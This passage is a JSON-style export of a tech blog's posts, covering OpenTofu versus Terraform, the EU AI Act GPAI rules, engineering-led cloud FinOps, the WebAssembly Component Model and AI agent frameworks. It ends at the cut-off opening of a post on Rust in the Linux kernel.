But maturity brings its own challenges.\nI\u0026rsquo;ve been running OpenTofu alongside Terraform in several projects, and the divergence between the two is now significant enough that the choice between them is no longer just philosophical — it\u0026rsquo;s technical. This aligns with broader cloud FinOps and cost engineering trends where infrastructure-as-code precision directly impacts operational costs.\nThe Fork Has Teeth Now # When OpenTofu first launched under the Linux Foundation\u0026rsquo;s stewardship, skeptics (myself included, to some degree) questioned whether a community fork could maintain the velocity and quality of a commercially-backed project. Those doubts have been largely put to rest.\nOpenTofu has shipped several features that Terraform doesn\u0026rsquo;t have, and vice versa. The most notable OpenTofu additions include client-side state encryption, which addresses a long-standing security concern about sensitive data in state files, and improvements to the provider development experience. These aren\u0026rsquo;t minor features — state encryption alone has been requested by the Terraform community for years.\nOn the other hand, HashiCorp has continued investing in Terraform with features tied more closely to their commercial ecosystem — deeper HCP Terraform integration, improved policy-as-code with Sentinel, and workflow improvements targeted at enterprise teams. The products are serving increasingly different audiences.\nProvider Ecosystem: The Real Battleground # The infrastructure-as-code tool itself is almost secondary to the provider ecosystem. Providers — the plugins that translate HCL configurations into API calls to AWS, Azure, GCP, and hundreds of other services — are where the real value lives. And here, the picture is complicated.\nMost major providers still maintain compatibility with both Terraform and OpenTofu, which makes sense given that the provider protocol hasn\u0026rsquo;t diverged dramatically. 
The major cloud provider plugins for AWS, Azure, and Google Cloud remain open source and work with both tools without modification.\nHowever, I\u0026rsquo;m starting to see some provider authors making choices. A few newer providers are being developed OpenTofu-first, taking advantage of OpenTofu-specific registry features. Meanwhile, some HashiCorp partner providers are optimized for Terraform Cloud integration in ways that don\u0026rsquo;t translate perfectly to OpenTofu.\nFor most teams, this isn\u0026rsquo;t a problem yet. But it\u0026rsquo;s a trend worth watching. The \u0026ldquo;write once, run on either\u0026rdquo; era may have an expiration date. The broader infrastructure landscape is also shaped by Kubernetes maturity and cloud platform convergence, which represent alternative approaches to infrastructure provisioning and management.\nState Management: Where OpenTofu Shines # If I had to pick one area where OpenTofu has genuinely leapfrogged Terraform, it\u0026rsquo;s state management. The client-side state encryption feature is a game-changer for organizations with strict compliance requirements.\nIn traditional Terraform workflows, state files contain plaintext representations of your infrastructure, including sensitive values like database passwords, API keys, and certificates. The recommended mitigation has always been to use encrypted remote backends like S3 with SSE-KMS, but that doesn\u0026rsquo;t protect against compromised backend access or insider threats.\nOpenTofu\u0026rsquo;s approach encrypts state data before it leaves the client, using AES-GCM authenticated encryption. This means your state backend never sees unencrypted sensitive data. 
I\u0026rsquo;ve deployed this in a financial services project where the compliance team had previously required a custom state management wrapper — OpenTofu\u0026rsquo;s native encryption eliminated that entirely.\nThe implementation is straightforward: you configure an encryption block in your OpenTofu configuration specifying the key provider (AWS KMS, GCP KMS, or a local key), and encryption is applied transparently. State operations work exactly as before from the user\u0026rsquo;s perspective.\nThe Migration Question # Every week, someone asks me whether they should migrate from Terraform to OpenTofu. My answer is, as usual, \u0026ldquo;it depends\u0026rdquo; — but I can be more specific about what it depends on.\nMigrate if: You\u0026rsquo;re concerned about future license changes. You value client-side state encryption. You want to contribute to the tool\u0026rsquo;s development. You\u0026rsquo;re not heavily invested in Terraform Cloud/Enterprise features. You\u0026rsquo;re running open-source Terraform anyway.\nStay if: You\u0026rsquo;re deeply integrated with HCP Terraform. Your team relies on Sentinel for policy enforcement. You have extensive Terraform Enterprise workflows. The migration risk outweighs the philosophical benefits.\nWait if: You\u0026rsquo;re on a stable Terraform setup that\u0026rsquo;s working fine and you have other priorities. The switching cost is real — not in HCL changes (which are minimal) but in CI/CD pipeline updates, state migration procedures, team training, and documentation updates.\nThe actual HCL syntax remains almost entirely compatible. I\u0026rsquo;ve migrated several projects by literally replacing the terraform binary with tofu and updating provider registry references. 
But the operational overhead of a migration extends well beyond the binary swap, especially in organizations with established workflows and automation.\nPulumi, CDK, and the Broader Landscape # It\u0026rsquo;s worth noting that the Terraform/OpenTofu question exists within a broader infrastructure-as-code landscape that keeps evolving. Pulumi continues to gain traction among teams that prefer general-purpose programming languages over HCL. AWS CDK has matured into a solid option for AWS-centric shops. And newer entrants like Winglang and SST are carving out niches in specific domains.\nI remain a pragmatist here. HCL-based tools (whether Terraform or OpenTofu) have an enormous ecosystem advantage and a well-understood operational model. They may not be the most elegant solution for every problem, but they\u0026rsquo;re the most widely understood, which has real value in teams with mixed experience levels. For organizations dealing with multi-cloud deployments, tools like these are essential for the consistency Google Cloud is pushing with platform engineering.\nThat said, if I were starting a greenfield project today with a team of experienced developers, I\u0026rsquo;d seriously consider Pulumi with TypeScript. The type safety, testability, and expressiveness of a real programming language address many of the frustrations I\u0026rsquo;ve accumulated over years of writing complex HCL.\nMy Take # The OpenTofu fork has been, on balance, a positive development for the infrastructure-as-code ecosystem. Competition drives innovation, and both projects are shipping features faster than they would in a monopoly scenario. The state encryption feature alone has justified the fork\u0026rsquo;s existence for security-conscious organizations.\nBut I\u0026rsquo;d caution against treating this as a religious debate. Both tools solve the same core problem competently. 
The best choice depends on your specific constraints — compliance requirements, team expertise, cloud provider mix, and organizational investment in either ecosystem.\nWhat I\u0026rsquo;m most interested in watching is whether the provider ecosystem remains shared or begins to fragment. That\u0026rsquo;s the variable that could shift the calculus dramatically in either direction. For now, we have the luxury of choice, and that\u0026rsquo;s a good position to be in.\n","date":"26 February 2026","externalUrl":null,"permalink":"/posts/260226-opentofu-infrastructure-as-code/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenTofu has matured significantly since its fork from Terraform. Here’s where things stand and what it means for teams managing cloud infrastructure.","title":"OpenTofu's Growing Pains — The State of Infrastructure as Code in 2026","type":"posts"},{"content":"","date":"26 February 2026","externalUrl":null,"permalink":"/tags/terraform/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Terraform","type":"tags"},{"content":"Six months ago, in August 2025, the EU AI Act\u0026rsquo;s provisions for general-purpose AI (GPAI) models officially came into force. We\u0026rsquo;re now past the initial grace period and squarely into the era where non-compliance has real consequences. If you\u0026rsquo;re building anything that touches foundation models in Europe — or for European customers — this matters to you.\nI\u0026rsquo;ve spent the last few weeks reviewing how the landscape has shifted since those provisions kicked in, and the picture is more nuanced than either the doomsayers or the optimists predicted.\nWhat the GPAI Rules Actually Require # Let\u0026rsquo;s start with the basics, because I still encounter teams that haven\u0026rsquo;t fully internalized what\u0026rsquo;s required. 
The Act distinguishes between standard GPAI models and those classified as presenting \u0026ldquo;systemic risk\u0026rdquo; — essentially models trained with compute exceeding 10^25 FLOPs, though the Commission can update these thresholds.\nFor all GPAI providers, the requirements include maintaining up-to-date technical documentation, providing clear information to downstream deployers, implementing a copyright compliance policy, and publishing a sufficiently detailed summary of training data. These requirements align with broader industry best practices around AI system governance. The training data summary has been the sticking point for most organizations I\u0026rsquo;ve spoken with.\nFor systemic-risk models, the bar is considerably higher: adversarial testing, incident monitoring and reporting to the AI Office, cybersecurity protections, and energy consumption reporting. The major labs — OpenAI, Google DeepMind, Anthropic, Mistral — have all published their compliance frameworks, though the depth and transparency vary significantly.\nThe Documentation Burden Is Real # In my experience working with teams integrating GPAI models into production systems, the documentation requirements have been the most disruptive change. Not because they\u0026rsquo;re unreasonable — they\u0026rsquo;re actually quite sensible from a governance perspective — but because most organizations simply weren\u0026rsquo;t set up to produce this level of documentation about their AI pipelines.\nThe technical documentation requirement under Annex XI is comprehensive. You need to describe the model architecture, training methodology, data sources and preprocessing, evaluation results, computational resources used, and known limitations. For teams that have been moving fast and iterating quickly on model fine-tuning and RAG pipelines, this means retroactively documenting decisions that were made informally.\nI\u0026rsquo;ve seen a few approaches emerge. 
Some larger organizations have hired dedicated AI governance teams. Others have integrated documentation requirements into their CI/CD pipelines — essentially treating model cards and data sheets as build artifacts that must pass review before deployment. This mirrors broader supply chain security governance approaches where verification is built into the development process rather than bolted on afterward. The latter approach resonates more with my engineering sensibilities: if compliance is part of the pipeline, it doesn\u0026rsquo;t become an afterthought.\nOpen Source Gets a (Partial) Pass # One aspect that deserves attention is how the Act treats open-source GPAI models. There\u0026rsquo;s a partial exemption: open-source models released under permissive licenses are exempt from some documentation and transparency requirements, unless they present systemic risk. This was a hard-fought compromise during the legislative process, and it\u0026rsquo;s proving to be a meaningful differentiator.\nProjects like Mistral\u0026rsquo;s open-weight releases and Meta\u0026rsquo;s Llama family have benefited from this carve-out. The broader ecosystem of open-source AI models continues to expand despite regulatory pressures. But there\u0026rsquo;s an important subtlety: the exemption applies to the model provider, not to deployers. If you take an open-source model and deploy it in a high-risk application in the EU, you inherit the full compliance burden for your specific use case.\nThis has created an interesting dynamic. I\u0026rsquo;m seeing more organizations choosing open-source base models not just for cost or flexibility reasons, but specifically because the compliance pathway is clearer and more manageable when you have full visibility into the model\u0026rsquo;s architecture and training process. 
This approach aligns with how foundation model architectures are evolving toward better transparency and control.\nThe Codes of Practice Are Still Taking Shape # The European AI Office has been working with industry stakeholders to develop codes of practice for GPAI providers. These codes are supposed to provide detailed guidance on how to meet the Act\u0026rsquo;s requirements — think of them as the practical \u0026ldquo;how\u0026rdquo; behind the legal \u0026ldquo;what.\u0026rdquo;\nAs of now, the drafts I\u0026rsquo;ve reviewed cover transparency, copyright compliance, and risk assessment, but they\u0026rsquo;re still being refined. The challenge is striking the right balance between specificity (which providers need for actual implementation) and flexibility (which prevents the codes from becoming obsolete as the technology evolves).\nFor smaller companies and startups, the codes of practice may actually be a lifeline. Without them, the Act\u0026rsquo;s requirements are high-level enough that interpretation becomes expensive — you either need specialized legal counsel or you over-engineer your compliance approach, wasting resources either way.\nMy Take: Pragmatic Progress with Growing Pains # I\u0026rsquo;ll be honest: six months ago, I was skeptical about whether these regulations would achieve anything beyond creating paperwork. But I\u0026rsquo;ve come around somewhat. The documentation requirements, while burdensome, have forced organizations to be more intentional about their AI development practices. Teams that used to treat model selection and deployment as purely technical decisions are now considering governance implications from the start.\nThe energy consumption reporting requirement for systemic-risk models is also quietly significant. 
We\u0026rsquo;re starting to get real data about the environmental cost of large-scale AI training, and that transparency will only become more important as these models grow.\nThat said, enforcement remains the open question. The AI Office has limited resources, and the interaction between EU-level oversight and national authorities is still being worked out. The next six months — leading up to the full enforcement of the high-risk AI system requirements in August — will tell us a lot about whether this framework has teeth.\nFor now, my advice to any team building with AI in or for Europe: don\u0026rsquo;t wait for perfect clarity. Start documenting your models, data pipelines, and deployment decisions today. The organizations that treat this as an opportunity to improve their engineering practices — rather than a regulatory burden to minimize — will be in the strongest position regardless of how enforcement develops.\nThis is part of a broader pattern I\u0026rsquo;ve been tracking in this series: AI development is maturing from a \u0026ldquo;move fast and break things\u0026rdquo; discipline into something that looks more like traditional software engineering, with governance, documentation, and accountability baked into the process. The initial developer compliance implications have only intensified, requiring teams to treat AI governance as a core engineering discipline rather than an afterthought. Whether that\u0026rsquo;s a good thing depends on your perspective, but it\u0026rsquo;s clearly the direction we\u0026rsquo;re heading.\n","date":"19 February 2026","externalUrl":null,"permalink":"/posts/260219-eu-ai-act-gpai-compliance/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The EU AI Act’s general-purpose AI provisions have been in force for six months. 
Here’s what’s actually changed for developers and organizations building with foundation models.","title":"EU AI Act GPAI Rules — Six Months In, and the Compliance Clock Is Ticking","type":"posts"},{"content":"I had an interesting conversation with a CTO last week. She told me her team\u0026rsquo;s cloud bill had grown 40% year-over-year despite serving roughly the same traffic. Not because they were doing anything wrong — they\u0026rsquo;d adopted new managed services, scaled for peak capacity, and added observability tooling. All good engineering decisions. But nobody was tracking the cumulative cost impact until the quarterly review hit.\nThis is a story I\u0026rsquo;m hearing more and more. The FinOps Foundation\u0026rsquo;s latest State of FinOps report shows that cloud cost management is now the top concern for engineering leadership, surpassing even security. And the solution isn\u0026rsquo;t finance dashboards — it\u0026rsquo;s engineering ownership.\nThe Shift from Finance to Engineering # Traditional cost management follows a simple pattern: finance sets budgets, IT stays within them, everyone reviews monthly reports. This worked when infrastructure was capital expenditure — you bought servers, amortized them over three years, and that was that.\nCloud broke this model completely. Every API call, every container spin-up, every byte stored is a variable cost decision made by engineers, often implicitly through architectural choices. When a developer chooses DynamoDB over PostgreSQL, or configures auto-scaling with generous headroom, or enables detailed CloudWatch metrics on every Lambda function, they\u0026rsquo;re making cost decisions. They just don\u0026rsquo;t know it. This connects to broader platform engineering and infrastructure-as-code practices that make these decisions visible and auditable.\nThe FinOps movement recognizes this reality and pushes cost awareness into the engineering workflow. 
But the first generation of FinOps was still finance-led: tagging policies, chargeback models, monthly reports with scary graphs. That\u0026rsquo;s necessary infrastructure, but it doesn\u0026rsquo;t change behavior where it matters — at the point of architectural and operational decisions.\nEngineering-First FinOps # The teams I see doing this well have shifted to what I\u0026rsquo;d call engineering-first FinOps. Here\u0026rsquo;s what that looks like in practice:\nCost as a metric in CI/CD. Tools like Infracost integrate into pull request workflows to show the estimated cost impact of infrastructure changes before they\u0026rsquo;re merged. This aligns with supply chain security practices where change verification matters. A Terraform change that adds a NAT Gateway to three availability zones gets a comment showing roughly $100/month in combined hourly charges (about $33 per gateway at us-east-1 on-demand rates), before data processing fees. The engineer makes an informed decision, the reviewer has context, and surprises are caught early.\nUnit economics in dashboards. Instead of tracking total cloud spend, track cost per request, cost per user, cost per transaction. These unit metrics let you distinguish between cost growth that\u0026rsquo;s proportional to business growth (healthy) and cost growth that\u0026rsquo;s disproportionate (a problem). Grafana and Datadog both have solid integrations with cloud billing APIs now, and embedding cost panels alongside performance metrics makes the trade-offs visible.\nArchitecture decision records with cost implications. When you\u0026rsquo;re choosing between a managed service and a self-hosted alternative, document the cost comparison alongside the operational trade-offs. A managed Kafka service might cost 3x what self-hosted Kafka costs in compute, but if it saves 0.5 FTE in operational overhead, that\u0026rsquo;s usually a win. Making these calculations explicit improves decision-making and creates institutional knowledge.\nReserved capacity and commitment planning as engineering work. 
Savings Plans and Reserved Instances can save 30-60% on baseline compute, but they require understanding your workload patterns. This isn\u0026rsquo;t finance work — it\u0026rsquo;s capacity planning, and engineers are better positioned to forecast it. Understanding infrastructure maturity and cloud platform capabilities helps predict cost-efficient workload patterns. The teams that treat commitment purchases as an engineering planning exercise consistently outperform those that delegate it to procurement.\nThe Tooling Landscape # The FinOps tooling space has matured significantly. Kubecost provides excellent Kubernetes cost allocation, breaking down spend by namespace, deployment, and even individual pod. CAST AI automates Kubernetes cost optimization through intelligent node selection and autoscaling. Cloud-native tools like AWS Cost Explorer and Azure Cost Management have gotten better at granular allocation.\nOpenCost, the CNCF incubating project, is worth watching as an open-source alternative to commercial solutions. It provides real-time cost monitoring for Kubernetes and integrates well with Prometheus-based observability stacks.\nBut tooling alone isn\u0026rsquo;t enough. I\u0026rsquo;ve seen teams deploy Kubecost, look at the dashboards for two weeks, and then ignore them. The tooling needs to be embedded in workflows — PR checks, sprint planning, architecture reviews — to actually change behavior.\nThe Waste Problem # Let me be blunt: most organizations are wasting 25-35% of their cloud spend. The FinOps Foundation\u0026rsquo;s data backs this up consistently. The biggest culprits:\nIdle resources. Development environments running 24/7, load balancers with no backends, EBS volumes detached from instances. Automated cleanup policies — scale dev environments to zero on nights and weekends, alert on idle resources, automatically terminate instances that haven\u0026rsquo;t served traffic in 72 hours — can cut this dramatically.\nOver-provisioned instances. 
Running m5.xlarge when your workload fits in a t3.medium. Right-sizing recommendations from cloud providers are often accurate and consistently ignored. Make right-sizing a quarterly engineering task, not a suggestion.\nData transfer costs. The hidden tax of cloud computing. Cross-AZ traffic, NAT Gateway data processing, CloudFront to origin transfers — these costs are invisible until they\u0026rsquo;re not. Architect for data locality, use VPC endpoints, and understand your data flow patterns.\nMy Take # The most important shift in FinOps isn\u0026rsquo;t technological — it\u0026rsquo;s cultural. Engineers need to care about cost the same way they care about performance and reliability. Not because it\u0026rsquo;s their job to minimize spend, but because cost is a signal about architectural health. A system that costs twice as much as it should is usually a system with other problems: over-complexity, poor resource management, missing automation.\nThe best engineers I\u0026rsquo;ve worked with have always had an intuitive sense of cost efficiency. They choose the right tool for the job, not the most expensive managed service. They build systems that scale down as well as they scale up. They understand that every architecture decision has a long-term cost implication.\nIf your team doesn\u0026rsquo;t have visibility into the cost of the systems they build and operate, fix that first. 
Everything else follows from awareness.\nMore infrastructure perspectives in my Infrastructure Notes series.\n","date":"12 February 2026","externalUrl":null,"permalink":"/posts/260212-cloud-finops-engineering-ownership/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"FinOps has evolved from a finance initiative to an engineering discipline, and the teams that treat cloud costs as a first-class engineering metric are winning.","title":"Cloud FinOps — Why Engineers Own the Cost Conversation Now","type":"posts"},{"content":" Overview # Building cloud infrastructure is one thing; operating it in production is another. This series covers cloud operations—the practices, tools, and strategies that keep systems reliable, cost-effective, and resilient. Topics include observability and monitoring, cost optimization at scale, incident response patterns, and the operational culture that separates well-run systems from perpetual firefighting.\nWhether you\u0026rsquo;re responsible for reliability, reducing cloud costs, or leading incident response, these insights apply directly to your work.\nWhat You\u0026rsquo;ll Find Here # Observability \u0026amp; Monitoring: Building effective monitoring systems, understanding metrics, logs, and traces. Knowing what to watch tells you when to care.\nCost Optimization: Understanding cloud billing, rightsizing, reserved instances, and spot instances. 
Reducing costs without sacrificing reliability requires strategy.\nIncident Response: Preparing for failures, detecting issues early, response playbooks, and learning from incidents without blame.\nInfrastructure as Code: Declarative infrastructure, drift detection, configuration management, and making infrastructure auditable and reproducible.\nCapacity Planning: Predicting growth, autoscaling strategies, and ensuring infrastructure scales smoothly with demand.\nDisaster Recovery: Backup strategies, failover mechanisms, multi-region concerns, and recovery time objectives.\nLearning Path # Master observability fundamentals — understand what metrics and logs actually tell you Implement comprehensive monitoring — dashboards, alerting, and actionable signals Learn to optimize costs — understand billing, identify waste, and right-size resources Build incident response muscle — playbooks, on-call rotations, and blameless postmortems Plan for growth — capacity planning, autoscaling, and handling traffic spikes Key Topics Covered # Monitoring \u0026amp; Observability: Prometheus, Datadog, New Relic, logs, metrics, traces, and SLOs Cloud Cost Management: RI analysis, spot pricing, reserved capacity, workload migration, and FinOps Incident Management: PagerDuty, alerting rules, runbooks, postmortem processes, and on-call culture Infrastructure as Code: Terraform, CloudFormation, Pulumi, Ansible, and drift detection Autoscaling \u0026amp; Performance: Load balancing, horizontal scaling, vertical scaling, and performance testing Disaster Recovery: Backup strategies, RTO/RPO targets, multi-region failover, and testing DR Related Series # Explore complementary areas: Cloud Platform Watch (new AWS/Azure/GCP features and pricing), Kubernetes \u0026amp; Containers (container orchestration operations)\n","date":"12 February 2026","externalUrl":null,"permalink":"/series/cloud-operations/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 
Cloud","summary":"","title":"Cloud Operations","type":"series"},{"content":"","date":"5 February 2026","externalUrl":null,"permalink":"/series/systems--emerging-languages/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Systems \u0026 Emerging Languages","type":"series"},{"content":"","date":"5 February 2026","externalUrl":null,"permalink":"/tags/webassembly/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"WebAssembly","type":"tags"},{"content":"The WebAssembly Component Model has been quietly reaching a critical inflection point. This week, the Bytecode Alliance published updated specifications for WASI 0.2.2, and the tooling ecosystem has matured enough that I think it\u0026rsquo;s time to pay serious attention. WebAssembly started as a browser technology, but its future is increasingly server-side, edge, and everywhere in between. As Kubernetes and container orchestration mature, WebAssembly components represent a complementary approach to workload portability and isolation.\nI\u0026rsquo;ve been experimenting with Wasm components for a side project — a plugin system for a data processing pipeline — and the experience has shifted from \u0026ldquo;interesting but painful\u0026rdquo; to \u0026ldquo;actually productive.\u0026rdquo; That\u0026rsquo;s a significant change from even six months ago.\nThe Component Model Explained # If you\u0026rsquo;ve used WebAssembly before, you\u0026rsquo;ve probably worked with core Wasm modules: single compilation units that export functions and import memory. They work, but they\u0026rsquo;re limited. Sharing complex data types between modules requires manual serialization. Composing modules into larger systems is ad-hoc. There\u0026rsquo;s no standard way to describe a module\u0026rsquo;s interface beyond its raw function signatures.\nThe Component Model fixes this by introducing a higher-level abstraction. 
A component is a Wasm module whose imports and exports are described in WIT (Wasm Interface Type), an interface language with high-level types: strings, records, variants, lists, options, results. Two components can be composed together if their interfaces match, regardless of the source language.\nThis is the key insight: language interoperability at the binary level. A component written in Rust can be composed with a component written in Python (via componentize-py), which can be composed with a component written in Go. They share a common type system and calling convention. No hand-written FFI, no manual serialization, no RPC overhead. This aligns with broader development ecosystem trends toward polyglot systems and language interoperability.\nWASI: The System Interface # The other half of the equation is WASI — the WebAssembly System Interface. If the Component Model defines how components talk to each other, WASI defines how components talk to the outside world: file systems, network sockets, clocks, random number generators, HTTP.\nWASI 0.2 (the \u0026ldquo;Preview 2\u0026rdquo; release that\u0026rsquo;s now stabilizing) is built on the Component Model. Each WASI capability is defined as a WIT interface, and a component declares which capabilities it needs. This gives you a capability-based security model by default: a component can\u0026rsquo;t access the network unless it explicitly imports the network interface, and the host explicitly provides it.\nFor anyone who\u0026rsquo;s dealt with container security — trying to restrict what a process can access via seccomp profiles, AppArmor, or capability dropping — the WASI model is refreshingly clean. The sandbox is the default, and capabilities are explicitly granted.\nThe Tooling Ecosystem # What\u0026rsquo;s changed recently is the tooling. cargo-component makes building Rust components straightforward. componentize-py handles Python. 
jco provides JavaScript tooling and can transpile components to run in Node.js or browsers. wit-bindgen generates language-specific bindings from WIT definitions.\nThe runtime story is also improving. Wasmtime from the Bytecode Alliance is the reference implementation and handles components well. WAMR targets embedded and IoT. Cloudflare Workers, Fermyon Spin, and Fastly Compute all support Wasm components in production, meaning there are real deployment targets available today.\nThe developer experience still has rough edges. Error messages from the component toolchain can be cryptic, debugging across component boundaries requires patience, and the documentation assumes more familiarity with the spec than most developers have. But it\u0026rsquo;s dramatically better than a year ago.\nReal Use Cases # The plugin system use case is the most immediately compelling. If you\u0026rsquo;re building a platform that needs user-extensible logic — data transformation pipelines, API gateways, workflow engines — Wasm components let you run user-supplied code safely without the overhead of containers or the risk of native code execution.\nEnvoy Proxy has been using Wasm for extensibility for years, and the Component Model makes that pattern more accessible. Instead of building custom plugin SDKs for each language, you define your plugin interface in WIT and let developers implement it in whatever language they prefer.\nEdge computing is another natural fit. Deploy the same component to Cloudflare Workers, a local Wasmtime instance, or an embedded device. The binary is portable, the sandboxing is built-in, and the startup time is measured in microseconds rather than the seconds it takes to boot a container. This represents a significant shift in how infrastructure is evolving toward lighter-weight, more portable compute primitives. 
This makes WebAssembly particularly relevant for edge computing and industrial IoT deployments where density and responsiveness matter.\nI\u0026rsquo;m also interested in the supply chain security implications. A Wasm component is a sealed unit with a declared interface. You can verify exactly what capabilities it requires before running it. Combined with signing and provenance metadata, this could meaningfully improve the software supply chain story. This aligns with broader SLSA and supply chain security frameworks that emphasize transparency and verification.\nMy Take # I think WebAssembly components are going to be a significant part of the server-side landscape within the next two to three years. Not replacing containers — that\u0026rsquo;s an overblown narrative — but complementing them for specific use cases where portability, security, and multi-language interoperability matter.\nThe \u0026ldquo;write once, run anywhere\u0026rdquo; comparison to Java is somewhat apt, but the execution is different. Java achieved portability through a managed runtime with its own ecosystem. Wasm achieves it through a minimal, sandboxed compilation target that multiple languages can target. The Component Model adds the composition layer that makes this practical for real systems.\nIf you\u0026rsquo;re building a platform that needs plugin extensibility, or deploying to edge environments, or working on systems where fine-grained sandboxing matters, the Component Model is worth evaluating now. The ecosystem is past the early adopter phase and entering the early majority. 
Start with cargo-component if you know Rust, or jco if you\u0026rsquo;re in the JavaScript world.\nContinuing my exploration of the evolving development landscape in the Developer Landscape series.\n","date":"5 February 2026","externalUrl":null,"permalink":"/posts/260205-webassembly-component-model-maturity/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The WebAssembly Component Model is reaching maturity, and it might finally deliver on the ‘write once, run anywhere’ promise that Java made thirty years ago.","title":"WebAssembly Components — The Missing Piece for Portable Software","type":"posts"},{"content":"If you\u0026rsquo;ve been following the AI tooling space at all this month, you\u0026rsquo;ll have noticed that \u0026ldquo;agentic AI\u0026rdquo; has become the dominant buzzword of early 2026. Every major framework has shipped agent capabilities, Microsoft\u0026rsquo;s AutoGen just released a significant rewrite, and the number of agent frameworks on GitHub has passed the point where anyone can reasonably evaluate them all. It feels like the JavaScript framework explosion of the mid-2010s, except the stakes are higher because these systems take actions in the real world.\nI\u0026rsquo;ve spent the past few weeks evaluating several of these frameworks for a client project, and I have thoughts.\nThe Framework Landscape # The current field breaks down roughly into three tiers. At the top, you have the battle-tested frameworks: LangChain/LangGraph, Microsoft\u0026rsquo;s AutoGen, and CrewAI. 
These have large communities, decent documentation, and enough production deployments to have surfaced (and sometimes fixed) real architectural issues.\nIn the middle tier, you have opinionated frameworks that solve specific problems well: Semantic Kernel for .NET shops, Haystack for search-centric applications, and DSPy for teams that want a more programmatic approach to prompt engineering.\nThen there\u0026rsquo;s the long tail — hundreds of frameworks that are essentially thin wrappers around the OpenAI API with a loop and some string formatting. These are the ones to be cautious about.\nWhat Actually Matters in an Agent Framework # After building several agent-based systems, I\u0026rsquo;ve settled on a short list of capabilities that separate useful frameworks from toys:\nState management and persistence. An agent that loses its context between turns is barely an agent. LangGraph\u0026rsquo;s approach of treating agent state as a graph with checkpointing is architecturally sound. You can pause, resume, inspect, and even replay agent execution. AutoGen\u0026rsquo;s new conversation patterns handle this differently but equally well. If your framework can\u0026rsquo;t persist and restore agent state across process restarts, walk away.\nTool calling with validation. The agent needs to call external tools — APIs, databases, file systems — and the framework needs to handle this safely. That means input validation, output parsing, error handling, and timeout management. It sounds basic, but many frameworks treat tool calling as an afterthought. The best ones let you define tools with proper type signatures and validate both inputs and outputs against schemas.\nObservability. When an agent makes a bad decision — and it will — you need to understand why. That means structured logging of every LLM call, every tool invocation, every decision point. 
LangSmith and similar tracing tools have made this much better, but observability should be a first-class concern in the framework itself, not bolted on after the fact.\nHuman-in-the-loop controls. Any agent that can take real actions needs a way for humans to approve, reject, or modify those actions before execution. This is non-negotiable for production systems. The frameworks that handle this well make it easy to insert approval gates at any point in the agent\u0026rsquo;s execution flow.\nThe Architecture Question # The more fundamental question is whether agents should be single-model systems or multi-agent collaborations. The multi-agent pattern — where specialized agents communicate to solve complex tasks — is theoretically elegant and practically messy.\nCrewAI leans heavily into the multi-agent metaphor, with \u0026ldquo;crews\u0026rdquo; of agents that have roles, goals, and backstories. It\u0026rsquo;s intuitive for simple workflows but gets complicated quickly when you need fine-grained control over agent communication. AutoGen\u0026rsquo;s new architecture is more flexible, with explicit conversation topologies that let you define exactly how agents interact.\nMy experience has been that most problems don\u0026rsquo;t need multi-agent systems. A single agent with well-designed tools and a clear prompt handles 80% of use cases more reliably than a crew of agents negotiating with each other. Multi-agent systems add latency (every inter-agent message is an LLM call), cost (token usage multiplies quickly), and debugging complexity.\nThe exceptions are genuine workflow orchestration problems where different steps require fundamentally different capabilities or models. A research agent that gathers information, hands it to an analysis agent with domain expertise, and then passes results to a writing agent — that\u0026rsquo;s a reasonable multi-agent architecture. 
But you should exhaust the single-agent approach first.\nThe Reliability Problem Nobody Talks About # Here\u0026rsquo;s the thing that the demos don\u0026rsquo;t show you: agents fail in production. A lot. The failure modes are different from traditional software — instead of exceptions and error codes, you get plausible-sounding wrong answers, infinite loops, and creative misinterpretations of instructions.\nBuilding reliable agents requires the same discipline as building any distributed system: retry logic, circuit breakers, fallback strategies, and comprehensive testing. Except testing is harder because the LLM\u0026rsquo;s behavior is non-deterministic. Your agent might handle a task perfectly 95 times out of 100 and fail catastrophically the other 5.\nThe teams I\u0026rsquo;ve seen succeed with agents in production all share one trait: they treat the LLM as an unreliable component and build guardrails accordingly. Every action gets validated. Every output gets checked. The agent\u0026rsquo;s autonomy is bounded by explicit constraints, not just instructions in a prompt.\nMy Take # We\u0026rsquo;re in the \u0026ldquo;build everything\u0026rdquo; phase of agent frameworks, and consolidation is coming. My bet is that LangGraph and AutoGen will emerge as the dominant platforms, with CrewAI holding a niche for simpler orchestration use cases. The long tail of thin wrappers will mostly disappear.\nIf you\u0026rsquo;re starting an agent project today, pick a framework with strong state management and observability, start with a single agent, and invest heavily in evaluation and testing infrastructure. The framework choice matters less than the engineering discipline you bring to using it.\nAnd please, before you build an agent, ask yourself: does this actually need to be an agent, or would a well-designed pipeline with a few LLM calls handle it? 
The answer is often the latter.\nPart of my AI in Development series exploring practical AI integration.\n","date":"29 January 2026","externalUrl":null,"permalink":"/posts/260129-ai-agent-frameworks-landscape/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The AI agent framework landscape has exploded, with LangGraph, CrewAI, AutoGen, and dozens more competing for developer mindshare. Here’s what matters.","title":"AI Agent Frameworks — The Wild West of Autonomous Systems","type":"posts"},{"content":"","date":"22 January 2026","externalUrl":null,"permalink":"/tags/linux/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Linux","type":"tags"},{"content":"It\u0026rsquo;s been over two years since Rust was officially merged into the Linux kernel with version 6.1, and the journey has been anything but smooth. This week, the Rust for Linux project hit another milestone with expanded driver support landing in the 6.13 development cycle, and it\u0026rsquo;s a good moment to take stock of where things stand.\nI\u0026rsquo;ve been writing C for the better part of three decades. I understand the kernel community\u0026rsquo;s attachment to the language — it\u0026rsquo;s not just familiarity, it\u0026rsquo;s a deeply optimized toolchain and decades of institutional knowledge. But watching the Rust integration unfold has been one of the most interesting language adoption stories I\u0026rsquo;ve seen in my career.\nThe Technical Progress # The numbers tell a compelling story. Rust code in the kernel has grown from the initial infrastructure patches to real, functional subsystems. The Android team at Google has been the most visible driver, with Rust-based Binder IPC drivers in active development. 
